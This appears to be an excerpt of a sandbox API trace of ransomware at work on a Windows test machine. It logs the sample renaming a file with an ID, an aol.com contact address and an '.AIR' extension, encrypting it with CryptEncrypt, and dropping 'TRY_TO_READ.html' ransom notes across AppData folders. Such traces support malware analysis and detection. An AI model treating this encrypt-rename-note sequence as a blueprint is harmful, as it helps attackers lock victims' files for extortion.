	[0105.719] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\GDIPFONTCACHEV1.DAT") returned 64
	[0105.719] GetProcessHeap () returned 0x540000
	[0105.719] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xe6) returned 0x56b300
	[0105.719] lstrcpyW (in: lpString1=0x56b300, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\GDIPFONTCACHEV1.DAT" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\GDIPFONTCACHEV1.DAT") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\GDIPFONTCACHEV1.DAT"
	[0105.719] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\GDIPFONTCACHEV1.DAT", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\GDIPFONTCACHEV1.DAT.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\GDIPFONTCACHEV1.DAT.12781717671972518758.ex_parvis@aol.com.AIR"
	[0105.720] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\GDIPFONTCACHEV1.DAT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\gdipfontcachev1.dat"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\GDIPFONTCACHEV1.DAT.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\gdipfontcachev1.dat.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0105.731] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\GDIPFONTCACHEV1.DAT.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\gdipfontcachev1.dat.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x504
	[0105.731] GetProcessHeap () returned 0x540000
	[0105.731] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56b300 | out: hHeap=0x540000) returned 1
	[0105.731] GetFileSizeEx (in: hFile=0x504, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=108824) returned 1
	[0105.731] SetFilePointer (in: hFile=0x504, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x1a918
	[0105.731] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0105.732] GetProcessHeap () returned 0x540000
	[0105.732] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0105.732] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0105.732] WriteFile (in: hFile=0x504, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0105.734] WriteFile (in: hFile=0x504, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0105.734] WriteFile (in: hFile=0x504, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0105.734] ReadFile (in: hFile=0x504, lpBuffer=0x37b0048, nNumberOfBytesToRead=0x1a918, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x37b0048*, lpNumberOfBytesRead=0x3a1f778*=0x1a918, lpOverlapped=0x0) returned 1
	[0105.738] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xe60a9730, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe60a9730, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dacb0
	[0105.738] FindNextFileW (in: hFindFile=0x5dacb0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xe60a9730, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe60a9730, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0105.738] FindNextFileW (in: hFindFile=0x5dacb0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd6e27e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Adobe", cAlternateFileName="")) returned 1
	[0105.738] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x508
	[0105.740] FindNextFileW (in: hFindFile=0x5dacb0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1
	[0105.740] FindNextFileW (in: hFindFile=0x5dacb0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sun", cAlternateFileName="")) returned 1
	[0105.740] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x508
	[0105.743] FindNextFileW (in: hFindFile=0x5dacb0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe60a9730, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xe60a9730, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe60a9730, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0105.743] FindNextFileW (in: hFindFile=0x5dacb0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe60a9730, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xe60a9730, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe60a9730, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0
	[0105.743] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xca740790, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xca740790, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dacf0
	[0105.743] FindNextFileW (in: hFindFile=0x5dacf0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xca740790, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xca740790, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0105.743] FindNextFileW (in: hFindFile=0x5dacf0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6d877bc0, ftCreationTime.dwHighDateTime=0x1d4c63c, ftLastAccessTime.dwLowDateTime=0xb75d9140, ftLastAccessTime.dwHighDateTime=0x1d4d31a, ftLastWriteTime.dwLowDateTime=0xb75d9140, ftLastWriteTime.dwHighDateTime=0x1d4d31a, nFileSizeHigh=0x0, nFileSizeLow=0xdace, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7 Uqeom4hFc w5.rtf", cAlternateFileName="7UQEOM~1.RTF")) returned 1
	[0105.743] FindNextFileW (in: hFindFile=0x5dacf0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc1171240, ftCreationTime.dwHighDateTime=0x1d4d15f, ftLastAccessTime.dwLowDateTime=0xcf89b5f0, ftLastAccessTime.dwHighDateTime=0x1d4cc6c, ftLastWriteTime.dwLowDateTime=0xcf89b5f0, ftLastWriteTime.dwHighDateTime=0x1d4cc6c, nFileSizeHigh=0x0, nFileSizeLow=0x1285d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="79HHaKdUA2S.odp", cAlternateFileName="79HHAK~1.ODP")) returned 1
	[0105.743] FindNextFileW (in: hFindFile=0x5dacf0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcc316b60, ftCreationTime.dwHighDateTime=0x1d4d38c, ftLastAccessTime.dwLowDateTime=0x24108410, ftLastAccessTime.dwHighDateTime=0x1d4d045, ftLastWriteTime.dwLowDateTime=0x24108410, ftLastWriteTime.dwHighDateTime=0x1d4d045, nFileSizeHigh=0x0, nFileSizeLow=0x176ac, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8exY0qxj9hCBG9q9yp5.csv", cAlternateFileName="8EXY0Q~1.CSV")) returned 1
	[0105.743] FindNextFileW (in: hFindFile=0x5dacf0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x9c9d0830, ftCreationTime.dwHighDateTime=0x1d4c713, ftLastAccessTime.dwLowDateTime=0x96bb3a60, ftLastAccessTime.dwHighDateTime=0x1d4cb03, ftLastWriteTime.dwLowDateTime=0x96bb3a60, ftLastWriteTime.dwHighDateTime=0x1d4cb03, nFileSizeHigh=0x0, nFileSizeLow=0x8aaf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8gazP5HKiuHlq.wav", cAlternateFileName="8GAZP5~1.WAV")) returned 1
	[0105.743] FindNextFileW (in: hFindFile=0x5dacf0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6cb851c0, ftCreationTime.dwHighDateTime=0x1d4d0f9, ftLastAccessTime.dwLowDateTime=0x24bd8f20, ftLastAccessTime.dwHighDateTime=0x1d4d2c5, ftLastWriteTime.dwLowDateTime=0x24bd8f20, ftLastWriteTime.dwHighDateTime=0x1d4d2c5, nFileSizeHigh=0x0, nFileSizeLow=0x3757, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="9MLI3b-.mp3", cAlternateFileName="")) returned 1
	[0105.743] FindNextFileW (in: hFindFile=0x5dacf0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Adobe", cAlternateFileName="")) returned 1
	[0105.743] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x50c
	[0105.747] FindNextFileW (in: hFindFile=0x5dacf0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2943a510, ftCreationTime.dwHighDateTime=0x1d4d168, ftLastAccessTime.dwLowDateTime=0x2f5011b0, ftLastAccessTime.dwHighDateTime=0x1d4d491, ftLastWriteTime.dwLowDateTime=0x2f5011b0, ftLastWriteTime.dwHighDateTime=0x1d4d491, nFileSizeHigh=0x0, nFileSizeLow=0x3004, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="B3NfBAlV.jpg", cAlternateFileName="")) returned 1
	[0105.747] FindNextFileW (in: hFindFile=0x5dacf0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd9fc7000, ftCreationTime.dwHighDateTime=0x1d4d4d1, ftLastAccessTime.dwLowDateTime=0xd3188e90, ftLastAccessTime.dwHighDateTime=0x1d4c775, ftLastWriteTime.dwLowDateTime=0xd3188e90, ftLastWriteTime.dwHighDateTime=0x1d4c775, nFileSizeHigh=0x0, nFileSizeLow=0x136b1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="dXTTQ0.avi", cAlternateFileName="")) returned 1
	[0105.748] FindNextFileW (in: hFindFile=0x5dacf0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x83504a0, ftCreationTime.dwHighDateTime=0x1d4d261, ftLastAccessTime.dwLowDateTime=0x223169e0, ftLastAccessTime.dwHighDateTime=0x1d4c57b, ftLastWriteTime.dwLowDateTime=0x223169e0, ftLastWriteTime.dwHighDateTime=0x1d4c57b, nFileSizeHigh=0x0, nFileSizeLow=0xe203, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="eWgX3C4.pps", cAlternateFileName="")) returned 1
	[0105.748] FindNextFileW (in: hFindFile=0x5dacf0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x734bc960, ftCreationTime.dwHighDateTime=0x1d4c6d4, ftLastAccessTime.dwLowDateTime=0x3392cf90, ftLastAccessTime.dwHighDateTime=0x1d4d01f, ftLastWriteTime.dwLowDateTime=0x3392cf90, ftLastWriteTime.dwHighDateTime=0x1d4d01f, nFileSizeHigh=0x0, nFileSizeLow=0xb698, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="eYvvTuUHA.mp4", cAlternateFileName="EYVVTU~1.MP4")) returned 1
	[0105.748] FindNextFileW (in: hFindFile=0x5dacf0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x39185a0, ftCreationTime.dwHighDateTime=0x1d4c98c, ftLastAccessTime.dwLowDateTime=0xfd83e940, ftLastAccessTime.dwHighDateTime=0x1d4d544, ftLastWriteTime.dwLowDateTime=0xfd83e940, ftLastWriteTime.dwHighDateTime=0x1d4d544, nFileSizeHigh=0x0, nFileSizeLow=0xbb7f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="f94QL.mp3", cAlternateFileName="")) returned 1
	[0105.748] FindNextFileW (in: hFindFile=0x5dacf0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x55d7aa50, ftCreationTime.dwHighDateTime=0x1d4d0cc, ftLastAccessTime.dwLowDateTime=0x9569ac70, ftLastAccessTime.dwHighDateTime=0x1d4cc69, ftLastWriteTime.dwLowDateTime=0x9569ac70, ftLastWriteTime.dwHighDateTime=0x1d4cc69, nFileSizeHigh=0x0, nFileSizeLow=0x4793, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="FH9o_eyMRD0hodV.mp3", cAlternateFileName="FH9O_E~1.MP3")) returned 1
	[0105.748] FindNextFileW (in: hFindFile=0x5dacf0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43a641f0, ftCreationTime.dwHighDateTime=0x1d4c54d, ftLastAccessTime.dwLowDateTime=0xc1ef950, ftLastAccessTime.dwHighDateTime=0x1d4d530, ftLastWriteTime.dwLowDateTime=0xc1ef950, ftLastWriteTime.dwHighDateTime=0x1d4d530, nFileSizeHigh=0x0, nFileSizeLow=0x83c8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fteg.doc", cAlternateFileName="")) returned 1
	[0105.748] FindNextFileW (in: hFindFile=0x5dacf0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd6c5bae0, ftCreationTime.dwHighDateTime=0x1d4cc11, ftLastAccessTime.dwLowDateTime=0x8d624960, ftLastAccessTime.dwHighDateTime=0x1d4cf02, ftLastWriteTime.dwLowDateTime=0x8d624960, ftLastWriteTime.dwHighDateTime=0x1d4cf02, nFileSizeHigh=0x0, nFileSizeLow=0xa2c0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="g0Imi6iVW.png", cAlternateFileName="G0IMI6~1.PNG")) returned 1
	[0105.748] FindNextFileW (in: hFindFile=0x5dacf0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x809b7c10, ftCreationTime.dwHighDateTime=0x1d4cdc2, ftLastAccessTime.dwLowDateTime=0x11df9b20, ftLastAccessTime.dwHighDateTime=0x1d4c62a, ftLastWriteTime.dwLowDateTime=0x11df9b20, ftLastWriteTime.dwHighDateTime=0x1d4c62a, nFileSizeHigh=0x0, nFileSizeLow=0x383f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="gyDR6VH2xt7GNQr.avi", cAlternateFileName="GYDR6V~1.AVI")) returned 1
	[0105.748] FindNextFileW (in: hFindFile=0x5dacf0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xdfed2190, ftCreationTime.dwHighDateTime=0x1d4d147, ftLastAccessTime.dwLowDateTime=0x113624c0, ftLastAccessTime.dwHighDateTime=0x1d4c998, ftLastWriteTime.dwLowDateTime=0x113624c0, ftLastWriteTime.dwHighDateTime=0x1d4c998, nFileSizeHigh=0x0, nFileSizeLow=0x81a4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HXi2.mkv", cAlternateFileName="")) returned 1
	[0105.748] FindNextFileW (in: hFindFile=0x5dacf0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Identities", cAlternateFileName="IDENTI~1")) returned 1
	[0105.748] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\identities\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x50c
	[0105.750] FindNextFileW (in: hFindFile=0x5dacf0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x137e2600, ftCreationTime.dwHighDateTime=0x1d4d209, ftLastAccessTime.dwLowDateTime=0xee09a820, ftLastAccessTime.dwHighDateTime=0x1d4cdd7, ftLastWriteTime.dwLowDateTime=0xee09a820, ftLastWriteTime.dwHighDateTime=0x1d4cdd7, nFileSizeHigh=0x0, nFileSizeLow=0x7dd9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Imrb_.odt", cAlternateFileName="")) returned 1
	[0105.750] FindNextFileW (in: hFindFile=0x5dacf0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb3af6940, ftCreationTime.dwHighDateTime=0x1d4cbba, ftLastAccessTime.dwLowDateTime=0x3e0bf4d0, ftLastAccessTime.dwHighDateTime=0x1d4c7c6, ftLastWriteTime.dwLowDateTime=0x3e0bf4d0, ftLastWriteTime.dwHighDateTime=0x1d4c7c6, nFileSizeHigh=0x0, nFileSizeLow=0x18793, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="JKKwQu3AVwy.m4a", cAlternateFileName="JKKWQU~1.M4A")) returned 1
	[0105.750] FindNextFileW (in: hFindFile=0x5dacf0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x11e281a0, ftCreationTime.dwHighDateTime=0x1d4d0fc, ftLastAccessTime.dwLowDateTime=0xb13969c0, ftLastAccessTime.dwHighDateTime=0x1d4d58a, ftLastWriteTime.dwLowDateTime=0xb13969c0, ftLastWriteTime.dwHighDateTime=0x1d4d58a, nFileSizeHigh=0x0, nFileSizeLow=0x18f42, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="KmVw_gx-j4WzwqJmCla.swf", cAlternateFileName="KMVW_G~1.SWF")) returned 1
	[0105.750] FindNextFileW (in: hFindFile=0x5dacf0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6b695060, ftCreationTime.dwHighDateTime=0x1d2dda5, ftLastAccessTime.dwLowDateTime=0x6b695060, ftLastAccessTime.dwHighDateTime=0x1d2dda5, ftLastWriteTime.dwLowDateTime=0x6b695060, ftLastWriteTime.dwHighDateTime=0x1d2dda5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Macromedia", cAlternateFileName="MACROM~1")) returned 1
	[0105.750] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\macromedia\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x50c
	[0105.752] FindNextFileW (in: hFindFile=0x5dacf0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x8d940a0, ftLastAccessTime.dwHighDateTime=0x1d305fe, ftLastWriteTime.dwLowDateTime=0x8d940a0, ftLastWriteTime.dwHighDateTime=0x1d305fe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1
	[0105.752] FindNextFileW (in: hFindFile=0x5dacf0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb8db5ab0, ftCreationTime.dwHighDateTime=0x1d4d4a6, ftLastAccessTime.dwLowDateTime=0x651d8a60, ftLastAccessTime.dwHighDateTime=0x1d4c574, ftLastWriteTime.dwLowDateTime=0x651d8a60, ftLastWriteTime.dwHighDateTime=0x1d4c574, nFileSizeHigh=0x0, nFileSizeLow=0x6c15, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Mmdd cqWFTgm4Sh.swf", cAlternateFileName="MMDDCQ~1.SWF")) returned 1
	[0105.752] FindNextFileW (in: hFindFile=0x5dacf0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb264df80, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb458e750, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb458e750, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Mozilla", cAlternateFileName="")) returned 1
	[0105.752] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x50c
